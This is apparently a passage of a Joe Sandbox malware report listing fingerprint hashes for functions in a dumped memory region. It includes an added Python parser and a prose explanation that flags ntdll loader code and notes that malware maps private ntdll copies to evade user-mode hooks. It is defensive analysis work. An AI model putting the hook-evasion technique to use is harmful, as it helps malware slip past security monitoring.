                                                • Opcode Fuzzy Hash: 94eebf268af24d1549aac170d8ac72a92997bdacb8f1495755db70f85375305b
                                                • Instruction Fuzzy Hash: 1601F4B2254704AFE311DF18CD4AF667BE8E755B25F008939B948C7290EB78ED04CB4A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: MUI
                                                • API String ID: 0-1339004836
                                                • Opcode ID: 14120ca3f09c9fbc6425cd049047efbee926fb129655eeb2698358cbfef7545b
                                                • Instruction ID: 2f29709f1d34cb7c5361b266f178d8d92e7e56b8802182451c9a18992150ca7e
                                                • Opcode Fuzzy Hash: 14120ca3f09c9fbc6425cd049047efbee926fb129655eeb2698358cbfef7545b
                                                • Instruction Fuzzy Hash: 2D824875E052188BDB24EFA9C984BBDB7B2FF48314F148169EC5AEB294D730AD41CB50
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 558dfa33673e4ff0fa5c287c480c9e262b53a0503f52b032bcfbb8b4dbe3e7c3
                                                • Instruction ID: 2b5deef81f64bc99e1bf22d547b9f37baa25cc7681dd204ba9e39cfaace8e7e3
                                                • Opcode Fuzzy Hash: 558dfa33673e4ff0fa5c287c480c9e262b53a0503f52b032bcfbb8b4dbe3e7c3
                                                • Instruction Fuzzy Hash: 73412AB4D042889FDB24CFA9C881AEEBBF8FB49300F50456EE959E7211DB709940DF60
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: GlobalTags
                                                • API String ID: 0-1106856819
                                                • Opcode ID: 67d5e6b0df7fcb79d83b6997e9453b0859775a7378a0254b181acbe4552a91f9
                                                • Instruction ID: 0c7539c9bf756afad445bfe8ca7fcd496506b45a00e2ecf3b95d8ca6125f31d7
                                                • Opcode Fuzzy Hash: 67d5e6b0df7fcb79d83b6997e9453b0859775a7378a0254b181acbe4552a91f9
                                                • Instruction Fuzzy Hash: 08716C75E0421ADFDF28CF9AD591AADBBB2BF48700F14822EE906E7240E7719D41CB50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                • Instruction ID: e177bf20b623e2741eb03566f47a2e78cfd3735510c5c0ebf768aeeddb09b2dd
                                                • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                • Instruction Fuzzy Hash: 59615775D04219ABDB21EFA9C845BBEBBB9FF84714F144169EC12E7290D7349E00CBA0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                • Instruction ID: defde22f4a09a1641353f2359ca41ddc89a3651f7b15e63b1e52c517fcb891de
                                                • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                • Instruction Fuzzy Hash: FB519D72604705AFDB219F58C844F6AB7E8FB84B50F040929B991D7290EB74EE44CB92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: EXT-
                                                • API String ID: 0-1948896318
                                                • Opcode ID: fda04fec9c1ba5cf0a4befc946c5dec90551e4e0b85341a4ae984f079e40bc1f
                                                • Instruction ID: a77cb690bcbdcb5f1748082de172766898c6278f2df3340e1e7ecc6f3baf5c99
                                                • Opcode Fuzzy Hash: fda04fec9c1ba5cf0a4befc946c5dec90551e4e0b85341a4ae984f079e40bc1f
                                                • Instruction Fuzzy Hash: 47418076609341ABDB29DA78C884B6BBBECAF88718F48092DFD85D7140E674DD04C793
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryHash
                                                • API String ID: 0-2202222882
                                                • Opcode ID: 26f8d04d0d34fe9ba55d8b218155a381e7a585507062847ebccd5c8907907744
                                                • Instruction ID: 3e76056e52171630d3d2f01c3c75da6b01a0f13b2465d88c7715a1076b6e7645
                                                • Opcode Fuzzy Hash: 26f8d04d0d34fe9ba55d8b218155a381e7a585507062847ebccd5c8907907744
                                                • Instruction Fuzzy Hash: D24161B1E1462CAADB219A54DC85FDEB77CAB48714F0045E5EB08EB140DB309F898FA5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: verifier.dll
                                                • API String ID: 0-3265496382
                                                • Opcode ID: 187baa2efa1e7e5935d0cb85f6c5ac4ad6c32a263a2652e397cb6d6afb0bef30
                                                • Instruction ID: 27f08a9a6eeb2b1e1039080ae7edb2b1ac0156687509f1534e419e3eb50a99de
                                                • Opcode Fuzzy Hash: 187baa2efa1e7e5935d0cb85f6c5ac4ad6c32a263a2652e397cb6d6afb0bef30
                                                • Instruction Fuzzy Hash: 1E31A071B143019FDB249F289851B36B7E9FB48710F55983AED49DF3C2EA358C808790
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: kLsE
                                                • API String ID: 0-3058123920
                                                • Opcode ID: 66526cf5555f24416cc53a04f7ea6d44661a0a39febdd2c53da1da8966b9a576
                                                • Instruction ID: ea87a77581e3e9f11a1cb782ce8afc4f82a1df6846bed043eda7bf71882e8e74
                                                • Opcode Fuzzy Hash: 66526cf5555f24416cc53a04f7ea6d44661a0a39febdd2c53da1da8966b9a576
                                                • Instruction Fuzzy Hash: 96417C712297688BE720EBA5E94EB793F98FB80B64F14011EFC51DA1C6CF741885C7A1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #
                                                • API String ID: 0-1885708031
                                                • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                • Instruction ID: e32e3a48d2b57b673c06bd8b4156bebc9de7cbd4bdb8830aedb099d5fbcf2327
                                                • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                • Instruction Fuzzy Hash: B8414975A0061AABEF25DF48C490ABEB7B9FB84605F00405AED46E7350DB749E41CBE1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Flst
                                                • API String ID: 0-2374792617
                                                • Opcode ID: 92385dd160a3876b3ed04a2567c5dd650889cf08a4e8c44c8cd128a686ee12ef
                                                • Instruction ID: 600ef9de3a30b2295da287e44d88ed8b2db3424fe575c65ffa0f28f3224876ab
                                                • Opcode Fuzzy Hash: 92385dd160a3876b3ed04a2567c5dd650889cf08a4e8c44c8cd128a686ee12ef
                                                • Instruction Fuzzy Hash: 044198B5209301DFE714CF18C480A66FBE9FB49714F14856EE85ACB241EB71DD42CB96
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Actx
                                                • API String ID: 0-89312691
                                                • Opcode ID: 6402f4b197569be178c6228e744ae77b40f941c35f58971756fdbf1bf9bd6884
                                                • Instruction ID: 73872616c56dc1ca8ed8d146c3ca09c07431cecb420e5d16f39d94cc53c185c3
                                                • Opcode Fuzzy Hash: 6402f4b197569be178c6228e744ae77b40f941c35f58971756fdbf1bf9bd6884
                                                • Instruction Fuzzy Hash: 8911B634308606ABDB24B91D885467677D7FB81228F34853AEC92CF391E675EC418381
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrCreateEnclave
                                                • API String ID: 0-3262589265
                                                • Opcode ID: 745b36e486a8b89c9a7d17781536ef0cad29eb18d5b35fc8eacc6064ad9dcb99
                                                • Instruction ID: 35ce512357a3eb92fab3ed6d8c5bf58f222d957544f71a79b63afbef71c3e592
                                                • Opcode Fuzzy Hash: 745b36e486a8b89c9a7d17781536ef0cad29eb18d5b35fc8eacc6064ad9dcb99
                                                • Instruction Fuzzy Hash: AE2107B16183449FC310DF1AC949A5BFBE8FBD5B50F404A1FB99497250DBB0D805DB92
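The records above are Joe Sandbox's per-function fingerprints for the dump at offset 05850000 in process 4 (Source File 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp). Several of them carry ntdll.dll's own loader debug strings: the source paths minkernel\ntdll\ldrtls.c and minkernel\ntdll\ldrinit.c and the routine names LdrpInitializeTls, LdrpInitializationFailure, RtlpInitializeAssemblyStorageMap, LdrResGetRCConfig and LdrCreateEnclave. A function that embeds an ntdll source path is ntdll loader code, so at least part of this dumped region is a copy of ntdll rather than code the sample wrote itself. That matters because a privately mapped, fresh copy of ntdll is a common way for malware to reach syscall stubs without passing through user-mode hooks in the ntdll image the OS loaded, and the decoded region attributes plus the string evidence are what let an analyst confirm or rule that out.

The parser below is an added example, not Joe Sandbox's code and not the sample's. It reads records in the format used on this page, decodes the .sdmp file name and flags dump regions whose strings include ntdll source paths. The decoding of the file name (first field as the report's process number; the three hex fields after the base address as MEMORY_BASIC_INFORMATION Protect, State and Type, so that 00000040/00001000/00020000 reads as PAGE_EXECUTE_READWRITE, MEM_COMMIT, MEM_PRIVATE) is an assumption this page does not document, although the constant values themselves are the Windows SDK ones. The embedded sample record is copied from the LdrpInitializeTls entry above.

```python
"""Parse the per-function fingerprint records Joe Sandbox emits for a memory
dump and check the dumped region for ntdll loader code. Added example, not
Joe Sandbox or FormBook code."""
import re

# ASSUMPTION (not documented on this page): in an .sdmp name the first field is
# the report's process number and the three hex fields after the base address
# are MEMORY_BASIC_INFORMATION Protect / State / Type. Unknown values stay raw.
PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
           0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
MTYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
SOURCE_RE = re.compile(r"Source File: (\S+), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")
NTDLL_SRC = "minkernel\\ntdll\\"   # source path that only ntdll's own debug tracing carries


def parse_records(text):
    """A record is an optional Strings block plus the bullets that follow it,
    ending at 'Instruction Fuzzy Hash', which is always the last bullet."""
    records, cur, section = [], {"strings": [], "fields": {}}, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line in HEADERS:
            section = line
            continue
        if section == "Strings":                    # "<text>, xrefs: <addr>[, <addr>...]"
            head, sep, tail = line.rpartition(", xrefs: ")
            cur["strings"].append((head, tail.split(", ")) if sep else (line, []))
            continue
        key, _, value = line.partition(":")         # key never contains ':'; value may
        key, value = key.strip(), value.strip()
        if key == "Source File":
            m = SOURCE_RE.match(line)
            cur["source_file"], cur["offset"] = m[1], int(m[2], 16)
            cur["based_on_pe"] = m[3] == "true"
        else:
            cur["fields"][key] = value
        if key == "Instruction Fuzzy Hash":
            records.append(cur)
            cur = {"strings": [], "fields": {}}
    return records


def describe_region(rec):
    """Decode the .sdmp name under the assumption stated at the top."""
    p = rec["source_file"].split(".")
    protect, state, mtype = (int(x, 16) for x in p[4:7])
    return {"process": int(p[0], 16), "base": int(p[3], 16),
            "protect": PROTECT.get(protect, hex(protect)),
            "state": STATE.get(state, hex(state)), "type": MTYPE.get(mtype, hex(mtype))}


def ntdll_markers(rec):
    """Strong: ntdll source paths. Weak: Ldr*/Rtlp* routine names, which a
    caller can also embed (e.g. for GetProcAddress), so they prove less."""
    ids = [s for s in rec["fields"].get("String ID", "").split("$") if s]
    strong = [s for s in ids if s.startswith(NTDLL_SRC)]
    weak = [s for s in ids if s not in strong and re.match(r"(Ldrp?|Rtlp)[A-Z]", s)]
    return strong, weak


def regions_with_ntdll_code(records):
    """Group records by (process, base); keep regions with a strong marker."""
    info = {}
    for rec in records:
        region = describe_region(rec)
        e = info.setdefault((region["process"], region["base"]),
                            {**region, "functions": 0, "strong": 0, "weak": 0})
        strong, weak = ntdll_markers(rec)
        e["functions"] += 1
        e["strong"] += len(strong)
        e["weak"] += len(weak)
    return {k: v for k, v in info.items() if v["strong"]}


# One record copied from the listing above (the LdrpInitializeTls function);
# the rest of the listing is in the same format and parses the same way.
SAMPLE = r"""
Strings
• LdrpInitializeTls, xrefs: 058F1A47
• minkernel\ntdll\ldrtls.c, xrefs: 058F1A51
• DLL "%wZ" has TLS information at %p, xrefs: 058F1A40
Memory Dump Source
• Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
Similarity
• API ID:
• String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
• API String ID: 0-931879808
• Opcode ID: 3a2b79ddca934ab24733097b5d7f264e1ee5319ec9740706b1b7d806a40d2828
• Instruction ID: 632452bfd6da0c5a1bb66e04d18222a78ecaf6ff5bd31c62dbe8e53080574a8d
• Opcode Fuzzy Hash: 3a2b79ddca934ab24733097b5d7f264e1ee5319ec9740706b1b7d806a40d2828
• Instruction Fuzzy Hash: 9F31C671B14308ABFB109B58C89EFAA76BDFB46754F05011AFD05EB290DBB0AD00C790
"""

if __name__ == "__main__":
    for (pid, base), e in regions_with_ntdll_code(parse_records(SAMPLE)).items():
        print(f"process {pid} {base:#x} {e['protect']}/{e['state']}/{e['type']}: "
              f"{e['functions']} functions, {e['strong']} ntdll source paths, {e['weak']} Ldr/Rtl names")
```

To run it over the whole listing, paste the report section into a file and hand its text to parse_records; the per-region summary then shows how many of the fingerprinted functions carry ntdll source paths. Routine names such as LdrCreateEnclave are counted separately as weak evidence because an export name on its own can just as well come from a caller's GetProcAddress string table.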
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 022b37a781a982ad62e3b6f4bc9e20c67d877bfc92193a19cd4f6362790835cd
                                                • Instruction ID: 6ec01f384d5ef212575b588916ae8ef7a4279bfafbc05ce3010851a6739b5241
                                                • Opcode Fuzzy Hash: 022b37a781a982ad62e3b6f4bc9e20c67d877bfc92193a19cd4f6362790835cd
                                                • Instruction Fuzzy Hash: D7426B71A046169FDB19CF59C490ABEF7F2FF89214B188569D952EB340DB34EC42CBA0
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 72860677d3f41cb2f0ca32f60f7ea3e5634f2713e203d47f48a48350771fa26b
                                                • Instruction ID: 06c0d69753d0019b21f9016ad132c36dc488a5a20fae2632022241e182e494c0
                                                • Opcode Fuzzy Hash: 72860677d3f41cb2f0ca32f60f7ea3e5634f2713e203d47f48a48350771fa26b
                                                • Instruction Fuzzy Hash: 9C22C1726086718FDB24CF29C454776B7F6BF44300F08885AE8878F68AD7B5E492DB64
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fd5c846078c1c6b21ac381efe9ceca7e332f359a1bd0cefd4f60f0aa2ed6d506
                                                • Instruction ID: 6f5e5bd6bf6f7c61e6e99496cecf22361fb7705b8fb26385653147206c28abf9
                                                • Instruction Fuzzy Hash: A0518C327096958FC722DB18C444F7A73B6FB86754F0909A6FC06DB691EB34EC44CAA1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a59bc54eec7f15446618f38a1b34881ae64cdeccbb932572b26914f1eda95f36
                                                • Instruction ID: 59831028423cbe6543e8cf60d9693297b7e7503da94de97666242e770cc8f0a9
                                                • Opcode Fuzzy Hash: a59bc54eec7f15446618f38a1b34881ae64cdeccbb932572b26914f1eda95f36
                                                • Instruction Fuzzy Hash: 2141DD35A00218DBEF15DF98C448AEEB7B9BF48604F14826AEC1AF7340D770AD45CBA5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                • Instruction ID: 3fc787db7337d1cffe5eaaf1c165a4f3120b75f2169b7b0a3b029d4789846bfd
                                                • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                • Instruction Fuzzy Hash: B7514C75A00619CFCB18CF58C580AADF7B6FF88724F2481A9D959E7750D730AE41CB90
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                • Instruction ID: b1e83ed351868c6b54a45e2d7f1c254a6737c1cc8faae162404e61d362bd8f39
                                                • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                • Instruction Fuzzy Hash: BF511871A05205DFCB18CF68C481AADBBF1FB48314B14856EDA1AD7345E734EA80CF90
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8603a316bb9bd4feda6a088dd1ffd3c211b9b5c750c0f231febf3ae5f8ce54ba
                                                • Instruction ID: 4fd0b5d8daa493b7aa5f8c89702a29f27f435b469fcc94fa13fa4c5e7081ca94
                                                • Opcode Fuzzy Hash: 8603a316bb9bd4feda6a088dd1ffd3c211b9b5c750c0f231febf3ae5f8ce54ba
                                                • Instruction Fuzzy Hash: 8851C470A0461ADBDB25EB28C809BF8B7B2FF11314F1442E5D92AE72C1EB749D81CB41
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b951443b9127b5a07fe9a6e79dd11710440488ebd971a43d8a5ed2ebd7311bdb
                                                • Instruction ID: 58acc9a01fc50575e150fac60d99266b7453c75f5ba629f719e1a3346614aed7
                                                • Opcode Fuzzy Hash: b951443b9127b5a07fe9a6e79dd11710440488ebd971a43d8a5ed2ebd7311bdb
                                                • Instruction Fuzzy Hash: 35417BB1651709AFDB22EF68C884B6ABBEAFF00694F044469ED55DB250E770DC00CB61
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                • Instruction ID: 302dd57e67799c1c5f9388c4d7565704a3bb5d9f63e0df696cea90b260d68c8e
                                                • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                • Instruction Fuzzy Hash: 9141B275B10205ABDF15DFA9CC94EBFBBBEBF89240F184069E801A7341DA70DD008BA0
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: afb2e99ce57ac2c47bc5d17f06b11df60e8d4b1818810cc7cb20b3713bef14dc
                                                • Instruction ID: 7fdfbdae22071c7d1b75980755d98b8e9ba9447e713420a2537602f6672f2ee7
                                                • Opcode Fuzzy Hash: afb2e99ce57ac2c47bc5d17f06b11df60e8d4b1818810cc7cb20b3713bef14dc
                                                • Instruction Fuzzy Hash: 1E41BF32A49208CFEF19DFA8C8947A97BB5BB09314F140156E826EB691DB34DD40CBA4
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c03573678a04a019ce9f05e32f7bda33c0dff209d57fada299d0f37c03ec99a7
                                                • Instruction ID: 22709090d8612a6bea335b6ea7b53e496ba4aa8ca75239910df9c27c83a9c482
                                                • Opcode Fuzzy Hash: c03573678a04a019ce9f05e32f7bda33c0dff209d57fada299d0f37c03ec99a7
                                                • Instruction Fuzzy Hash: D441B1762193049BD720EF28C994E6A7BB9FB85720F01456EFD16C7291DB30EC01CB92
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                • Instruction ID: d9bb92c1910d0f932571674d8fc6787381d684aabb50edbb5c22efc6d4ca1fab
                                                • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                • Instruction Fuzzy Hash: C7411931B08219DBDB28DE598444BBEFBA2FB40756F16846AEC46DB240D631DD40DFA1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                • Instruction ID: 77e22617dc794e403b5a39541f46546d4d7f52235fc1d3698f11287402fdf60d
                                                • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                • Instruction Fuzzy Hash: E6411675A04705EFEB24CF98C984AAAB7F9FB08700B10496DE956DB390D770AE44CB94
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3ba416bd55b306cffd505a51d7765816edaffdbcf6997d07db223099c6059c5b
                                                • Instruction ID: c324894a08766b5f5f41c7ca904cc4db06ee4de12ffdeb625311c490a966fba8
                                                • Opcode Fuzzy Hash: 3ba416bd55b306cffd505a51d7765816edaffdbcf6997d07db223099c6059c5b
                                                • Instruction Fuzzy Hash: F4414875605B08DFCB25FF29C944A69B7F2FB84214F1482AAD917DB2A0EB309D41CB52
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 146bfc974076ef5e81d586ed03940b56a3b7570a25f02e15d3b45794da1b64b5
                                                • Instruction ID: 4b23da6bf60db239f88d28c1094d90cb120cfbe3b1db4edb8478307038c843ac
                                                • Opcode Fuzzy Hash: 146bfc974076ef5e81d586ed03940b56a3b7570a25f02e15d3b45794da1b64b5
                                                • Instruction Fuzzy Hash: F44171716183049FD760DF28C849B9BBBE8FF88654F404A2EF998D7290DB74D904CB92
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6876cc78266b85a8408f905529d4d466a35d8547c37e07a579ddf141693f1b7a
                                                • Instruction ID: 4651e63935aba0f060af1fa275c0b26ed9e146b8f379d48c13f30c38fb9e0e6c
                                                • Opcode Fuzzy Hash: 6876cc78266b85a8408f905529d4d466a35d8547c37e07a579ddf141693f1b7a
                                                • Instruction Fuzzy Hash: 2A41C0726087419FC320DF69C844BAAB7AAFFC8700F440A2DF895D7690E730E904C7A6
                                                Memory Dump Source
